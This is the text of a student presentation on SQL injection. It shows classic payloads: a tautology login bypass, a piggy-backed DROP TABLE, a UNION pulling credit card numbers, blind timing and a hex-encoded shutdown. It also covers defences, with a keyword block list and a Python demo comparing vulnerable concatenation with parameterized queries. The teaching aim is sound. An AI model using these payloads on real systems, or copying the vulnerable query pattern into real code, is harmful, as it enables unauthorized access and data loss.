SQL Injection Attacks S Vinay Kumar, 07012D0506. Outline SQL Injection ? Classification of Attacks Attack Techniques Prevention Techniques Conclusion.


1 SQL Injection Attacks
S Vinay Kumar, 07012D0506

2 Outline
- SQL Injection?
- Classification of Attacks
- Attack Techniques
- Prevention Techniques
- Conclusion

3 What is a SQL Injection?
The ability to inject SQL commands into the database engine through an existing application.

4 Classification of Attacks
- Identifying Database Finger-Print
- Identifying Injectable Parameters
- Discovering Database Schema
- Bypassing Authentication
- Extracting/Modifying Database Data
- Downloading/Uploading Files
- Executing Remote Commands
- Escalating Privilege

5 Attack Techniques

6 1. Tautology: Exploits the WHERE clause
Usual login query:
    SELECT * FROM acct WHERE login = 'raju' AND password = '123'
JSP login query syntax (the query is built by string concatenation):
    var sql = "SELECT * FROM users WHERE login = '" + usr + "' AND password = '" + pwd + "'";

7 Injecting through the input string:
    usr = ' or 1=1 --
    pwd = anything
Final query would look like this (everything after -- is a comment, so the password check is discarded):
    SELECT * FROM acct WHERE username = '' or 1=1 -- ' AND password = 'anything'


9 2. Piggy-backed Query: a second statement is appended to the intended one
Injecting through the input string:
    usr = xyz
    pwd = 0;drop table users
Final query would look like this:
    SELECT * FROM acct WHERE username = 'xyz' AND password = 0;drop table users

10 3. Union Query: used to retrieve specific information from another table
Injecting through the input string:
    usr = ' UNION SELECT cardNo from CreditCards where acctNo = 7032 --
    pwd = anything
Final query would look like this:
    SELECT * FROM acct WHERE username = '' UNION SELECT cardNo from CreditCards where acctNo = 7032 -- ' AND password = 'anything'

11 4. Malformed Query: Also called Second-order Injection
Injecting through the input string:
    usr = xyz
    pwd = convert(int,(select top 1 name from sysobjects where xtype = 'u'))
Final query would look like this:
    SELECT * FROM acct WHERE username = 'xyz' AND password = convert(int,(select top 1 name from sysobjects where xtype = 'u'))

12 SQL Server may return the following error, which leaks a table name from the schema:
    "Microsoft OLE DB Provider for SQL Server (0x80040E07) Error converting nvarchar value 'CreditCards' to a column of data type int"

13 5. Inference Based Attacks: Also called Blind Injection
Injecting in the input string:
    usr = legalUser' AND ASCII(SUBSTRING((select top 1 name from sysobjects), 1, 1)) > X WAITFOR 5 --
    pwd = anything
Final query would look like this:
    SELECT * FROM acct WHERE username = 'legalUser' AND ASCII(SUBSTRING((select top 1 name from sysobjects), 1, 1)) > X WAITFOR 5 -- ' AND password = 'anything'

14 6. Alternate Encodings: the payload is hex-encoded to evade simple keyword filters
Injecting through the input string:
    usr = (empty)
    pwd = 0; exec(char(0x73687574646f776e))
Final query would look like this:
    SELECT * FROM acct WHERE username = '' AND password = 0; exec(char(0x73687574646f776e))
The hex string decodes to the "shutdown" command.

15 Prevention Techniques

16 1. Use Parameterized Queries
- Separates data from the query
- Allows creation of static queries with bind variables

17 Parameterized query in Java (JDBC):
    String custname = request.getParameter("customerName");
    // perform input validation on custname to detect attacks
    String query = "SELECT account_balance FROM user_data WHERE user_name = ? ";
    PreparedStatement pstmt = connection.prepareStatement(query);
    pstmt.setString(1, custname);   // bound as data; it can never change the SQL text
    ResultSet results = pstmt.executeQuery();
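An added example (not from the presentation), written in Python with sqlite3 so it runs offline: the concatenated login query from slide 6 beside the bind-variable form from slide 17, each fed the tautology input from slide 7. The acct table and its single row are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory database with the slide's acct table and one user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE acct (login TEXT, password TEXT)")
    conn.execute("INSERT INTO acct VALUES ('raju', '123')")
    conn.commit()
    return conn


def login_concat(conn, usr, pwd):
    """Vulnerable: builds the SQL text from user input, as on slide 6.
    Returns the number of matching rows (non-zero means 'logged in')."""
    sql = ("SELECT * FROM acct WHERE login = '" + usr
           + "' AND password = '" + pwd + "'")
    # SQLite, like SQL Server, treats '--' as a comment, so the tautology
    # input turns the WHERE clause into  login = '' or 1=1
    return len(conn.execute(sql).fetchall())


def login_param(conn, usr, pwd):
    """Hardened: placeholders keep the input as data; the SQL text is static."""
    sql = "SELECT * FROM acct WHERE login = ? AND password = ?"
    return len(conn.execute(sql, (usr, pwd)).fetchall())


def demo():
    """Run both forms with a valid credential and with the slide-7 input."""
    conn = make_db()
    tautology = "' or 1=1 --"
    return {
        "concat_valid": login_concat(conn, "raju", "123"),
        "concat_tautology": login_concat(conn, tautology, "anything"),
        "param_valid": login_param(conn, "raju", "123"),
        "param_tautology": login_param(conn, tautology, "anything"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows} row(s) matched")
```

The concatenated form matches a row for the tautology input (authentication bypassed); the parameterized form matches none, because the whole string is compared against the login column as a literal value.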

18 2. Customized Error Messages
- Knowing the database schema makes the attacker's job easier.
- Avoid displaying detailed error messages and stack traces to external users.

19 3. White List Based Validation
- Involves defining exactly what IS authorized
- Allow input within a well-defined set of safe values
  – By defining a very strong validation pattern
- Implement stringent "known bad" filters
  – Eg: Reject "select", "insert", "update", "shutdown", "delete", "drop", "--", "'"

20 4. Limiting Privileges
- Admin-type access rights for the application accounts must be avoided
- Create a view that limits access to only the needed portion of the data

21 5. Other preventions
- Validate and filter the input data using strong regular expression patterns
- System stored procedure reduction
- Encrypting sensitive data

22 Conclusion
Present-day development is focused more on web applications, so there is an urgent need to educate developers and students on SQL injection. When programmers and system administrators understand the attacks more thoroughly, more attacks will be detected and more countermeasures will be introduced into the systems.

23 Thank You
Queries?

